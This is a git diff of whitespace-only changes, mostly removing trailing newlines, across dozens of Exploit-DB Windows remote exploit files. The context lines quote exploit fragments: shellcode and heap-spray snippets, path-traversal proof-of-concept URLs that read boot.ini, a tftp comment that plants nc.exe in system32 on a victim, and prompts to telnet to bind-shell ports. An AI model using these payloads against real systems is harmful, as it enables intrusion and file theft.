a/platforms/windows/remote/14451.rb b/platforms/windows/remote/14451.rb index 9ffb6fbcd..ec9898878 100755 --- a/platforms/windows/remote/14451.rb +++ b/platforms/windows/remote/14451.rb @@ -78,4 +78,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/1448.pl b/platforms/windows/remote/1448.pl index 047425cb3..7d4524863 100755 --- a/platforms/windows/remote/1448.pl +++ b/platforms/windows/remote/1448.pl @@ -58,4 +58,4 @@ $offset . # ret adresas á kokio dll'o call esp ar jmp esp, ar ka nor "\x65\x70\x61\x64\x2E\x65\x78\x65\x01"; $ftp->login("$user","biatch"); -# milw0rm.com [2006-01-25] +# milw0rm.com [2006-01-25] \ No newline at end of file diff --git a/platforms/windows/remote/14496.py b/platforms/windows/remote/14496.py index c50aca351..6463d6d85 100755 --- a/platforms/windows/remote/14496.py +++ b/platforms/windows/remote/14496.py @@ -78,4 +78,4 @@ try: print "[!] Payload sent..." s.close() except: - print "[x] Error!" + print "[x] Error!" \ No newline at end of file diff --git a/platforms/windows/remote/14505.html b/platforms/windows/remote/14505.html index d31591d6e..89afcf4cd 100755 --- a/platforms/windows/remote/14505.html +++ b/platforms/windows/remote/14505.html @@ -51,5 +51,4 @@ target.LoadProperties arg1 Barcodewiz 3.29 - - + \ No newline at end of file diff --git a/platforms/windows/remote/14514.html b/platforms/windows/remote/14514.html index bd3c94496..0b7d767dc 100755 --- a/platforms/windows/remote/14514.html +++ b/platforms/windows/remote/14514.html @@ -136,4 +136,4 @@ gLnAPOdPWsnABr6p/hBXj4sgchrNQrtd3oPkfCTvRXIBmtKTD+PtQZoADRMm2clJCmPt0xjdiNFc 4Eh84nSjQkfrZXyoWBcDO6RXoWd39QCrVfuqB4pVDxTrcRsf4aAe9tA+ciGa0oON1btOxX8fII0G /4jv0gP/yxH+GmZ81ev/Ap0fi0U= --> - + \ No newline at end of file diff --git a/platforms/windows/remote/1452.pm b/platforms/windows/remote/1452.pm index 352c3e446..748439173 100755 --- a/platforms/windows/remote/1452.pm +++ b/platforms/windows/remote/1452.pm @@ -122,4 +122,4 @@ sub Exploit { } -# milw0rm.com [2006-01-25] +# milw0rm.com [2006-01-25] \ No newline at end of file diff --git a/platforms/windows/remote/14522.rb b/platforms/windows/remote/14522.rb index 635d4124f..0a5e59654 100755 --- a/platforms/windows/remote/14522.rb +++ b/platforms/windows/remote/14522.rb @@ -114,4 +114,4 @@ class Metasploit3 < Msf::Auxiliary end end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/1458.cpp b/platforms/windows/remote/1458.cpp index dd36945c5..4df8c4314 100755 --- a/platforms/windows/remote/1458.cpp +++ b/platforms/windows/remote/1458.cpp @@ -88,4 +88,4 @@ int main(int argc,char *argv[]) return 1; } -// milw0rm.com [2006-01-29] +// milw0rm.com [2006-01-29] \ No newline at end of file diff --git a/platforms/windows/remote/14586.html b/platforms/windows/remote/14586.html index 48e8f76cd..2583fdd5f 100755 --- a/platforms/windows/remote/14586.html +++ b/platforms/windows/remote/14586.html @@ -54,4 +54,4 @@ arg1 = buffer + jmp + nops + shellcode + nops1 target.Enque = arg1 - + \ No newline at end of file diff --git a/platforms/windows/remote/1460.pm b/platforms/windows/remote/1460.pm index 345bcca4f..585df6b28 100755 --- a/platforms/windows/remote/1460.pm +++ b/platforms/windows/remote/1460.pm @@ -294,4 +294,4 @@ sub RandomNamesFun { } 1; -# milw0rm.com [2006-01-31] +# milw0rm.com [2006-01-31] \ No newline at end of file diff --git a/platforms/windows/remote/14600.html b/platforms/windows/remote/14600.html index a47f9ddae..c1565c7ab 100755 --- a/platforms/windows/remote/14600.html +++ b/platforms/windows/remote/14600.html @@ -115,4 +115,4 @@ for (i=0;i<40000;i++) boom.SetSopAddress(x); // getting address to trigger the boom - + \ No newline at end of file diff --git a/platforms/windows/remote/14604.py b/platforms/windows/remote/14604.py index a289d83e1..8385babd1 100755 --- a/platforms/windows/remote/14604.py +++ b/platforms/windows/remote/14604.py @@ -52,4 +52,4 @@ def GenericEasyFTPExploit(target, CMDS): target = sys.argv[1] CMDS = sys.argv[2] -GenericEasyFTPExploit(target,CMDS) +GenericEasyFTPExploit(target,CMDS) \ No newline at end of file diff --git a/platforms/windows/remote/14605.html b/platforms/windows/remote/14605.html index d3eb011cf..28d2f43fc 100755 --- a/platforms/windows/remote/14605.html +++ b/platforms/windows/remote/14605.html @@ -36,4 +36,4 @@ for( counter=0; counter<=1000; counter++) ret+=unescape("%0a%0a%0a%0a"); target.OpenFile(ret); - + \ No newline at end of file diff --git a/platforms/windows/remote/1462.cpp b/platforms/windows/remote/1462.cpp index 345b2ee03..fca786920 100755 --- a/platforms/windows/remote/1462.cpp +++ b/platforms/windows/remote/1462.cpp @@ -170,4 +170,4 @@ return 0; // Bye! // [USER ] [padding NOP1] [rEIP] [padding NOP2] [ShellCode] [\r\n] // 5 219 4 720 379 2 -// milw0rm.com [2006-01-31] +// milw0rm.com [2006-01-31] \ No newline at end of file diff --git a/platforms/windows/remote/14623.py b/platforms/windows/remote/14623.py index 759f6ba0d..0d5c4490b 100755 --- a/platforms/windows/remote/14623.py +++ b/platforms/windows/remote/14623.py @@ -64,4 +64,4 @@ s.send('PASS ftp\r\n') s.recv(1024) print "[+] Sending payload..." s.send(command +' '+payload+'\r\n') -s.close() +s.close() \ No newline at end of file diff --git a/platforms/windows/remote/1463.pm b/platforms/windows/remote/1463.pm index f8cbd1311..fe6ec3b09 100755 --- a/platforms/windows/remote/1463.pm +++ b/platforms/windows/remote/1463.pm @@ -104,4 +104,4 @@ sub Exploit 1; -# milw0rm.com [2006-02-01] +# milw0rm.com [2006-02-01] \ No newline at end of file diff --git a/platforms/windows/remote/14658.txt b/platforms/windows/remote/14658.txt index 236a7ab29..5e9ff2565 100755 --- a/platforms/windows/remote/14658.txt +++ b/platforms/windows/remote/14658.txt @@ -62,4 +62,4 @@ Policy Rules: .. -"Open Policy Crossdomain.xml file allows other SWF files to make HTTP requests to your web server and see its response. This can be used for accessing one time tokens and CSRF nonces to bypass CSRF restrictions." Netsparker web app scanner +"Open Policy Crossdomain.xml file allows other SWF files to make HTTP requests to your web server and see its response. This can be used for accessing one time tokens and CSRF nonces to bypass CSRF restrictions." Netsparker web app scanner \ No newline at end of file diff --git a/platforms/windows/remote/1466.pl b/platforms/windows/remote/1466.pl index 3451a279a..3d19b45dd 100755 --- a/platforms/windows/remote/1466.pl +++ b/platforms/windows/remote/1466.pl @@ -58,4 +58,4 @@ print "\nsending exploit......\n\n"; print "\ntelnet to server port 9191 .........\n\n"; -# milw0rm.com [2006-02-03] +# milw0rm.com [2006-02-03] \ No newline at end of file diff --git a/platforms/windows/remote/14779.pl b/platforms/windows/remote/14779.pl index c8d55c4af..d946ad5a2 100755 --- a/platforms/windows/remote/14779.pl +++ b/platforms/windows/remote/14779.pl @@ -34,6 +34,4 @@ exit(0); #get sensitive file #c:\windows\system32>tftp [VICTIM_IP] get ../../boot.ini boot.ini put malware c:\windows\system32>tftp [VICTIM_IP] put nc.exe ../../WINDOWS/system32/nc.exe #**************************************************************** -#Credits : This vulnerability was discovered by demonalex(at)163(dot)com Pentester/Researcher Dark2S Security Team/Venustech.GZ Branch - - +#Credits : This vulnerability was discovered by demonalex(at)163(dot)com Pentester/Researcher Dark2S Security Team/Venustech.GZ Branch \ No newline at end of file diff --git a/platforms/windows/remote/14853.py b/platforms/windows/remote/14853.py index 9140dc7d9..6f9e2438e 100755 --- a/platforms/windows/remote/14853.py +++ b/platforms/windows/remote/14853.py @@ -287,4 +287,4 @@ def main(): print '[-] Exiting ...' sys.exit(-1) if __name__ == '__main__': - main() + main() \ No newline at end of file diff --git a/platforms/windows/remote/14856.txt b/platforms/windows/remote/14856.txt index c838b569b..e2ebb4852 100755 --- a/platforms/windows/remote/14856.txt +++ b/platforms/windows/remote/14856.txt @@ -115,4 +115,4 @@ tftp> What impact the vulnerability has on the vulnerable system Any additional details that might help in the verification process -* High, since when exploiting the vulnerability the attacker is able to get full access to the victim filesystem. +* High, since when exploiting the vulnerability the attacker is able to get full access to the victim filesystem. \ No newline at end of file diff --git a/platforms/windows/remote/14885.html b/platforms/windows/remote/14885.html index 4b3d2c7a8..41166ded7 100755 --- a/platforms/windows/remote/14885.html +++ b/platforms/windows/remote/14885.html @@ -53,5 +53,4 @@ behind it - - + \ No newline at end of file diff --git a/platforms/windows/remote/149.c b/platforms/windows/remote/149.c index 80f915a2b..d269e158d 100755 --- a/platforms/windows/remote/149.c +++ b/platforms/windows/remote/149.c @@ -518,4 +518,4 @@ void main(int argc, char **argv) return; } -// milw0rm.com [2004-01-27] +// milw0rm.com [2004-01-27] \ No newline at end of file diff --git a/platforms/windows/remote/15001.html b/platforms/windows/remote/15001.html index 09746ac31..e59ad3ac2 100755 --- a/platforms/windows/remote/15001.html +++ b/platforms/windows/remote/15001.html @@ -51,4 +51,4 @@ http://www.exploit-db.com/moaub-14-novell-iprint-client-browser-plugin-executere - + \ No newline at end of file diff --git a/platforms/windows/remote/15016.rb b/platforms/windows/remote/15016.rb index 2bc1df989..62c76af08 100755 --- a/platforms/windows/remote/15016.rb +++ b/platforms/windows/remote/15016.rb @@ -358,4 +358,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/1502.py b/platforms/windows/remote/1502.py index 885181554..37c72e67d 100755 --- a/platforms/windows/remote/1502.py +++ b/platforms/windows/remote/1502.py @@ -103,4 +103,4 @@ except IOError: print "success." -# milw0rm.com [2006-02-16] +# milw0rm.com [2006-02-16] \ No newline at end of file diff --git a/platforms/windows/remote/1504.pm b/platforms/windows/remote/1504.pm index 9b315cc68..289a49973 100755 --- a/platforms/windows/remote/1504.pm +++ b/platforms/windows/remote/1504.pm @@ -263,4 +263,4 @@ sub Gzip { 1; -# milw0rm.com [2006-02-17] +# milw0rm.com [2006-02-17] \ No newline at end of file diff --git a/platforms/windows/remote/15042.py b/platforms/windows/remote/15042.py index 8e95c1d40..84e10f8a4 100755 --- a/platforms/windows/remote/15042.py +++ b/platforms/windows/remote/15042.py @@ -60,4 +60,4 @@ temp = temp + """' /> htmlFile = open("call-back-url.html","w") htmlFile.write(temp) -htmlFile.close() +htmlFile.close() \ No newline at end of file diff --git a/platforms/windows/remote/15048.txt b/platforms/windows/remote/15048.txt index c540eb873..720d0d241 100755 --- a/platforms/windows/remote/15048.txt +++ b/platforms/windows/remote/15048.txt @@ -52,4 +52,4 @@ Site}/path/*payload*relative/path/to/target/file/ ../../../../../../SmarterMail/{Domain}/{(l)uzername)/PubPayloadDir/logo_25.jpg%../%../somewhere to read/write A workaround is posted in the Source URL -http://cloudscan.blogspot.com/2010/09/smarter-stats-533819-file-fuzzing.html +http://cloudscan.blogspot.com/2010/09/smarter-stats-533819-file-fuzzing.html \ No newline at end of file diff --git a/platforms/windows/remote/1505.html b/platforms/windows/remote/1505.html index 2372a73eb..8389adcee 100755 --- a/platforms/windows/remote/1505.html +++ b/platforms/windows/remote/1505.html @@ -102,4 +102,4 @@ spray += unescape( -# milw0rm.com [2006-02-17] +# milw0rm.com [2006-02-17] \ No newline at end of file diff --git a/platforms/windows/remote/1506.c b/platforms/windows/remote/1506.c index 7e291c68c..7e981ffa6 100755 --- a/platforms/windows/remote/1506.c +++ b/platforms/windows/remote/1506.c @@ -486,4 +486,4 @@ return 0; } -// milw0rm.com [2006-02-17] +// milw0rm.com [2006-02-17] \ No newline at end of file diff --git a/platforms/windows/remote/15071.txt b/platforms/windows/remote/15071.txt index 3d4d0501f..9e399bb47 100755 --- a/platforms/windows/remote/15071.txt +++ b/platforms/windows/remote/15071.txt @@ -91,4 +91,4 @@ buffof = String(262, "A") + "BBBB" + String(4408, "C") + "DDDD" bardecode.DebugTraceFile = buffof - + \ No newline at end of file diff --git a/platforms/windows/remote/15072.rb b/platforms/windows/remote/15072.rb index 879303bce..a886f3b46 100755 --- a/platforms/windows/remote/15072.rb +++ b/platforms/windows/remote/15072.rb @@ -151,4 +151,4 @@ for (#{j_counter} = 0; #{j_counter} < #{fillto}; #{j_counter}++) { handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/151.txt b/platforms/windows/remote/151.txt index f431de433..ebf9b68e4 100755 --- a/platforms/windows/remote/151.txt +++ b/platforms/windows/remote/151.txt @@ -38,4 +38,4 @@ if (confirm("Press OK to run backbutton exploit!")) backbutton(); -# milw0rm.com [2004-02-04] +# milw0rm.com [2004-02-04] \ No newline at end of file diff --git a/platforms/windows/remote/15168.rb b/platforms/windows/remote/15168.rb index cf43c48cb..70e66eb3c 100755 --- a/platforms/windows/remote/15168.rb +++ b/platforms/windows/remote/15168.rb @@ -144,4 +144,4 @@ for (#{j_counter} = 0; #{j_counter} < #{fillto}; #{j_counter}++) { # Handle the payload handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/1520.pl b/platforms/windows/remote/1520.pl index f6e7d3caf..2819b88aa 100755 --- a/platforms/windows/remote/1520.pl +++ b/platforms/windows/remote/1520.pl @@ -118,4 +118,4 @@ close(EXPLOIT); :0400F000658014F122 :00000001FF -# milw0rm.com [2006-02-22] +# milw0rm.com [2006-02-22] \ No newline at end of file diff --git a/platforms/windows/remote/15241.txt b/platforms/windows/remote/15241.txt index 7e859ebd9..e5bdf35bb 100755 --- a/platforms/windows/remote/15241.txt +++ b/platforms/windows/remote/15241.txt @@ -60,5 +60,4 @@ SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS -Code: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15241.zip (iExploit12-DEP.zip) - +Code: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15241.zip (iExploit12-DEP.zip) \ No newline at end of file diff --git a/platforms/windows/remote/15266.txt b/platforms/windows/remote/15266.txt index c133a74c7..223d4d7e8 100755 --- a/platforms/windows/remote/15266.txt +++ b/platforms/windows/remote/15266.txt @@ -1739,5 +1739,4 @@ Chapter 16, pp 369. The contents of this advisory are copyright (c) 2010 Hernan Ochoa, and may be distributed freely provided that no fee is charged for -distribution and proper credit is given. - +distribution and proper credit is given. \ No newline at end of file diff --git a/platforms/windows/remote/15288.txt b/platforms/windows/remote/15288.txt index fcf385f46..7ee4ecce7 100755 --- a/platforms/windows/remote/15288.txt +++ b/platforms/windows/remote/15288.txt @@ -107,4 +107,4 @@ Security-Assessment.com is committed to security research and development, and i For further information on this issue or any of our service offerings, contact us: Web: www.security-assessment.com -Email: info@security-assessment.com +Email: info@security-assessment.com \ No newline at end of file diff --git a/platforms/windows/remote/15292.rb b/platforms/windows/remote/15292.rb index 80e3d036a..d8abee6d7 100755 --- a/platforms/windows/remote/15292.rb +++ b/platforms/windows/remote/15292.rb @@ -467,4 +467,4 @@ rescue Exception => e $stderr.puts "Exploit failed: #{e}" raise if $debugging -end +end \ No newline at end of file diff --git a/platforms/windows/remote/15296.txt b/platforms/windows/remote/15296.txt index 2164c8483..61f4efa4a 100755 --- a/platforms/windows/remote/15296.txt +++ b/platforms/windows/remote/15296.txt @@ -216,4 +216,4 @@ http://abysssec.com/files/Adobe_Shockwave_Director_rcsL_Chunk_Memory_Corruption. https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15296.zip PS 1 : this vulnerability is not patched bug released by ZDI http://www.zerodayinitiative.com/advisories/ZDI-10-162/ -PS 2 : itís possible to exploit this vulnerability on modern windows like Vista/7 too and itís up to readers Ö +PS 2 : itís possible to exploit this vulnerability on modern windows like Vista/7 too and itís up to readers Ö \ No newline at end of file diff --git a/platforms/windows/remote/15333.txt b/platforms/windows/remote/15333.txt index 88545ec41..ada1d6ed8 100755 --- a/platforms/windows/remote/15333.txt +++ b/platforms/windows/remote/15333.txt @@ -22,4 +22,4 @@ exploited to read files outside of the webroot directory. --PoC-- http://localhost:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini -http://localhost:8080/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cboot.ini +http://localhost:8080/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cboot.ini \ No newline at end of file diff --git a/platforms/windows/remote/15336.txt b/platforms/windows/remote/15336.txt index d97a21503..bfac9cc54 100755 --- a/platforms/windows/remote/15336.txt +++ b/platforms/windows/remote/15336.txt @@ -23,4 +23,4 @@ http://[ webserver IP][:port][/.../]logo.bmp (File Download) http://localhost:8080/.../index.html -#[pocoftheday.blogspot.com] +#[pocoftheday.blogspot.com] \ No newline at end of file diff --git a/platforms/windows/remote/15347.py b/platforms/windows/remote/15347.py index fbe8fc2dc..ae565708a 100755 --- a/platforms/windows/remote/15347.py +++ b/platforms/windows/remote/15347.py @@ -264,6 +264,4 @@ fileobj.write("POST /"+Request+"") # 025D2D3E push eax # 025D2D3F call @ILT+120575(_sscanf) (1AF7704h) # 025D2D44 add esp,10h -# 025D2D47 mov dword ptr [ebp-1FCh],eax - - +# 025D2D47 mov dword ptr [ebp-1FCh],eax \ No newline at end of file diff --git a/platforms/windows/remote/15349.txt b/platforms/windows/remote/15349.txt index 87c1d39cb..073de8bf3 100755 --- a/platforms/windows/remote/15349.txt +++ b/platforms/windows/remote/15349.txt @@ -240,4 +240,4 @@ root@voltron:/dotdotpwn-v2.1# Download the DotDotPwn v2.1 from the oficial site http://dotdotpwn.sectester.net or from the mirror at http://chatsubo-labs.blogspot.com. - Vote for DotDotPwn as tool for next BackTrack release!! -> http://www.backtrack-linux.org/forums/tool-requests/32082-dotdotpwn.html + Vote for DotDotPwn as tool for next BackTrack release!! -> http://www.backtrack-linux.org/forums/tool-requests/32082-dotdotpwn.html \ No newline at end of file diff --git a/platforms/windows/remote/1536.pm b/platforms/windows/remote/1536.pm index fa6aaffe4..5b7080616 100755 --- a/platforms/windows/remote/1536.pm +++ b/platforms/windows/remote/1536.pm @@ -220,4 +220,4 @@ sub Gzip { 1; -# milw0rm.com [2006-02-28] +# milw0rm.com [2006-02-28] \ No newline at end of file diff --git a/platforms/windows/remote/1537.pm b/platforms/windows/remote/1537.pm index 626a7098c..45b0a6dab 100755 --- a/platforms/windows/remote/1537.pm +++ b/platforms/windows/remote/1537.pm @@ -105,4 +105,4 @@ sub Exploit 1; -# milw0rm.com [2006-02-28] +# milw0rm.com [2006-02-28] \ No newline at end of file diff --git a/platforms/windows/remote/15421.html b/platforms/windows/remote/15421.html index c7cf622f6..d5cb0a5ad 100755 --- a/platforms/windows/remote/15421.html +++ b/platforms/windows/remote/15421.html @@ -59,4 +59,4 @@ document.write(""); - + \ No newline at end of file diff --git a/platforms/windows/remote/15427.txt b/platforms/windows/remote/15427.txt index f254ac07f..fc79d7b0d 100755 --- a/platforms/windows/remote/15427.txt +++ b/platforms/windows/remote/15427.txt @@ -64,4 +64,4 @@ default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect -C:\Documents and Settings\Admin> +C:\Documents and Settings\Admin> \ No newline at end of file diff --git a/platforms/windows/remote/15437.txt b/platforms/windows/remote/15437.txt index 3c146ff20..e2caef55c 100755 --- a/platforms/windows/remote/15437.txt +++ b/platforms/windows/remote/15437.txt @@ -64,4 +64,4 @@ default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect -C:\Documents and Settings\Admin> +C:\Documents and Settings\Admin> \ No newline at end of file diff --git a/platforms/windows/remote/15438.txt b/platforms/windows/remote/15438.txt index cb7315523..376423b25 100755 --- a/platforms/windows/remote/15438.txt +++ b/platforms/windows/remote/15438.txt @@ -64,4 +64,4 @@ default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect -C:\Documents and Settings\Admin> +C:\Documents and Settings\Admin> \ No newline at end of file diff --git a/platforms/windows/remote/15445.txt b/platforms/windows/remote/15445.txt index 95a4fa478..47d74a4ae 100755 --- a/platforms/windows/remote/15445.txt +++ b/platforms/windows/remote/15445.txt @@ -195,4 +195,4 @@ timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect -root@voltron:/dotdotpwn-v2.1# +root@voltron:/dotdotpwn-v2.1# \ No newline at end of file diff --git a/platforms/windows/remote/15450.txt b/platforms/windows/remote/15450.txt index c3930ff46..fce135e01 100755 --- a/platforms/windows/remote/15450.txt +++ b/platforms/windows/remote/15450.txt @@ -55,5 +55,4 @@ timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect -226 Transfer complete. - +226 Transfer complete. \ No newline at end of file diff --git a/platforms/windows/remote/155.c b/platforms/windows/remote/155.c index eea58e09b..5ce970267 100755 --- a/platforms/windows/remote/155.c +++ b/platforms/windows/remote/155.c @@ -229,4 +229,4 @@ \*============================\* www.coromputer.net */===========================*/ -// milw0rm.com [2004-02-26] +// milw0rm.com [2004-02-26] \ No newline at end of file diff --git a/platforms/windows/remote/156.c b/platforms/windows/remote/156.c index 698ac9b5e..817f5526b 100755 --- a/platforms/windows/remote/156.c +++ b/platforms/windows/remote/156.c @@ -265,4 +265,4 @@ return 0; } -// milw0rm.com [2004-02-26] +// milw0rm.com [2004-02-26] \ No newline at end of file diff --git a/platforms/windows/remote/15600.html b/platforms/windows/remote/15600.html index 1e29fa640..5e62d3706 100755 --- a/platforms/windows/remote/15600.html +++ b/platforms/windows/remote/15600.html @@ -78,4 +78,4 @@ while(pwnt.length <= 83){ // Get down tonight! document.getElementById('target').MapZone( pwnt ); - + \ No newline at end of file diff --git a/platforms/windows/remote/15601.html b/platforms/windows/remote/15601.html index 087d094c7..58d96a2bb 100755 --- a/platforms/windows/remote/15601.html +++ b/platforms/windows/remote/15601.html @@ -73,4 +73,4 @@ var arg1=202116108; // 0x0c0c0c0c in decimal Sploit #1
-Sploit #2 +Sploit #2 \ No newline at end of file diff --git a/platforms/windows/remote/15648.html b/platforms/windows/remote/15648.html index 06d277544..e6c8a1c8b 100755 --- a/platforms/windows/remote/15648.html +++ b/platforms/windows/remote/15648.html @@ -57,4 +57,4 @@ are also vulnerable to the same exploit: target.RemoveAccessPermission arg1 ,arg2 target.AddLaunchPermission arg1 ,arg2 target.AddAccessPermission arg1 ,arg2 ---> +--> \ No newline at end of file diff --git a/platforms/windows/remote/1565.pl b/platforms/windows/remote/1565.pl index db66a8feb..36f71439b 100755 --- a/platforms/windows/remote/1565.pl +++ b/platforms/windows/remote/1565.pl @@ -73,4 +73,4 @@ use IO::Socket; $connect->send($user . $buffer . $shellcode . $eax . $peb . $enter); print "[+] Sent shellcode..telnet to victim host port 9191\n"; -# milw0rm.com [2006-03-07] +# milw0rm.com [2006-03-07] \ No newline at end of file diff --git a/platforms/windows/remote/15658.rb b/platforms/windows/remote/15658.rb index 167465e82..e96cd12d8 100755 --- a/platforms/windows/remote/15658.rb +++ b/platforms/windows/remote/15658.rb @@ -149,4 +149,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/15689.py b/platforms/windows/remote/15689.py index ef3be66a6..aea5cafdc 100755 --- a/platforms/windows/remote/15689.py +++ b/platforms/windows/remote/15689.py @@ -78,5 +78,4 @@ try: print("[-] Connect to " + ip + " on port 4444") except: print("[-] Connection error...") - print("[-] Check if victim is up.") - + print("[-] Check if victim is up.") \ No newline at end of file diff --git a/platforms/windows/remote/157.c b/platforms/windows/remote/157.c index 2fd4bc0cf..cd18d5e07 100755 --- a/platforms/windows/remote/157.c +++ b/platforms/windows/remote/157.c @@ -267,4 +267,4 @@ return; -// milw0rm.com [2004-02-27] +// milw0rm.com [2004-02-27] \ No newline at end of file diff --git a/platforms/windows/remote/158.c b/platforms/windows/remote/158.c index d8554a34f..179d2dbfc 100755 --- a/platforms/windows/remote/158.c +++ b/platforms/windows/remote/158.c @@ -579,4 +579,4 @@ close (fd); -// milw0rm.com [2004-02-27] +// milw0rm.com [2004-02-27] \ No newline at end of file diff --git a/platforms/windows/remote/15869.txt b/platforms/windows/remote/15869.txt index 2d2473a6c..d790d4c2b 100755 --- a/platforms/windows/remote/15869.txt +++ b/platforms/windows/remote/15869.txt @@ -48,4 +48,4 @@ However, here we are. And two of three are unpatched. proof of concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15869.zip (9sg_ca_d2d.zip) +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15869.zip (9sg_ca_d2d.zip) \ No newline at end of file diff --git a/platforms/windows/remote/159.c b/platforms/windows/remote/159.c index f0fbdc975..c1db65488 100755 --- a/platforms/windows/remote/159.c +++ b/platforms/windows/remote/159.c @@ -555,4 +555,4 @@ return 0; } -// milw0rm.com [2004-02-29] +// milw0rm.com [2004-02-29] \ No newline at end of file diff --git a/platforms/windows/remote/1592.c b/platforms/windows/remote/1592.c index e3c5ab9de..746f46670 100755 --- a/platforms/windows/remote/1592.c +++ b/platforms/windows/remote/1592.c @@ -303,4 +303,4 @@ void main(int argc,char* argv[]) printf("[?]Sending finished...Good luck!\n"); } -// milw0rm.com [2006-03-19] +// milw0rm.com [2006-03-19] \ No newline at end of file diff --git a/platforms/windows/remote/15984.html b/platforms/windows/remote/15984.html index b114aaba4..2ec0f52b7 100755 --- a/platforms/windows/remote/15984.html +++ b/platforms/windows/remote/15984.html @@ -346,4 +346,4 @@ function MakeAddressString(addrint) { - + \ No newline at end of file diff --git a/platforms/windows/remote/15991.html b/platforms/windows/remote/15991.html index 4f3e82a8a..e62715635 100755 --- a/platforms/windows/remote/15991.html +++ b/platforms/windows/remote/15991.html @@ -41,4 +41,4 @@ obj.RecordClip(file, "audio/mpeg3", "clipInfo"); - + \ No newline at end of file diff --git a/platforms/windows/remote/16036.rb b/platforms/windows/remote/16036.rb index cd5786a49..7f3a30d77 100755 --- a/platforms/windows/remote/16036.rb +++ b/platforms/windows/remote/16036.rb @@ -88,4 +88,4 @@ sleep(2) command= "telnet "+ host +" 4444" -system(command) +system(command) \ No newline at end of file diff --git a/platforms/windows/remote/16052.txt b/platforms/windows/remote/16052.txt index d243ecaae..5b0389bc3 100755 --- a/platforms/windows/remote/16052.txt +++ b/platforms/windows/remote/16052.txt @@ -130,4 +130,4 @@ is strictly prohibited. If you have received this message in error, please notif either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding statements by e-mail unless otherwise agreed. ------------------------------------ +----------------------------------- \ No newline at end of file diff --git a/platforms/windows/remote/16053.txt b/platforms/windows/remote/16053.txt index dc5f206fd..8949c4a8c 100755 --- a/platforms/windows/remote/16053.txt +++ b/platforms/windows/remote/16053.txt @@ -132,4 +132,4 @@ is strictly prohibited. If you have received this message in error, please notif either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding statements by e-mail unless otherwise agreed. ------------------------------------ +----------------------------------- \ No newline at end of file diff --git a/platforms/windows/remote/16055.txt b/platforms/windows/remote/16055.txt index 29683e557..98db5e666 100755 --- a/platforms/windows/remote/16055.txt +++ b/platforms/windows/remote/16055.txt @@ -128,4 +128,4 @@ is strictly prohibited. If you have received this message in error, please notif either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding statements by e-mail unless otherwise agreed. ------------------------------------ +----------------------------------- \ No newline at end of file diff --git a/platforms/windows/remote/16056.txt b/platforms/windows/remote/16056.txt index 2b473cb5f..33b67aeaf 100755 --- a/platforms/windows/remote/16056.txt +++ b/platforms/windows/remote/16056.txt @@ -128,4 +128,4 @@ is strictly prohibited. If you have received this message in error, please notif either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding statements by e-mail unless otherwise agreed. ------------------------------------ +----------------------------------- \ No newline at end of file diff --git a/platforms/windows/remote/1606.html b/platforms/windows/remote/1606.html index 47f05c2cc..3216bb0a9 100755 --- a/platforms/windows/remote/1606.html +++ b/platforms/windows/remote/1606.html @@ -83,4 +83,4 @@ shellcode = unescape( "%u9090%u9090%u9090%uC929%uE983%uD9DB%uD9EE%u2474" + -# milw0rm.com [2006-03-23] +# milw0rm.com [2006-03-23] \ No newline at end of file diff --git a/platforms/windows/remote/1607.cpp b/platforms/windows/remote/1607.cpp index eb1d2714b..ce9911ff9 100755 --- a/platforms/windows/remote/1607.cpp +++ b/platforms/windows/remote/1607.cpp @@ -100,4 +100,4 @@ int main(int argc,char *argv[]) return 1; } -// milw0rm.com [2006-03-23] +// milw0rm.com [2006-03-23] \ No newline at end of file diff --git a/platforms/windows/remote/16075.pl b/platforms/windows/remote/16075.pl index d5325519c..93bb2658e 100755 --- a/platforms/windows/remote/16075.pl +++ b/platforms/windows/remote/16075.pl @@ -45,7 +45,4 @@ if (@ARGV < 3) { # #--------------------------------------------- #site : zt-security.com - colombohackers.com 